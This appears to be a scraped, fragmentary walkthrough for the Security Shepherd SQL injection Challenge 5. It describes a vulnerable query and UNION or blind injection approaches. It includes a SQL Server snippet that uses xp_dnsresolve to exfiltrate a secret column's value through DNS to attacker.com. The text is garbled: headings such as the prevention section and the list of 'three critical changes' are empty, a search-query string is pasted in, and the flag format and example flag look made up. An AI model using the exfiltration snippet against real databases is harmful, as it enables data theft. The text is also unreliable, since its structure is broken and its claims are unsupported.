Once you successfully extract the data, the flag for Security Shepherd Challenge 5 usually follows the format:
OSWE-<Random_Hash> or shepherd_<alphanumeric>.
Example found in walkthroughs: OSWE-5d41402abc4b2a76b9719d911017c592
You will notice the keyword "new" appearing frequently in search queries. Historically, earlier versions of Security Shepherd (pre-2021) had a relatively straightforward SQLi in Challenge 5. However, the "new" iteration—updated for modern OWASP Top 10 compliance—introduced three critical changes:
These changes force the attacker to use blind, boolean-based, case-shifted injection. sql+injection+challenge+5+security+shepherd+new
Challenge 5 usually requires a UNION-Based injection or a Blind injection, depending on how the backend handles errors.
Let’s assume the underlying query is:
SELECT first_name, last_name FROM user_data WHERE user_id = ' + userInput + '
To prevent this attack:
xp_dnsresolve is a SQL Server extended stored procedure that resolves a domain name to an IP address. It makes a DNS lookup.
Attack mechanics:
Example:
DECLARE @data varchar(8000);
SELECT @data = (SELECT TOP 1 secret_column FROM secrets_table);
EXEC xp_dnsresolve @data + '.attacker.com';
Now we attempt a UNION SELECT to see where data is reflected on the screen.
If the challenge is a login form, you might need to use specific column names (like username and password) or simply rely on the numeric placeholders.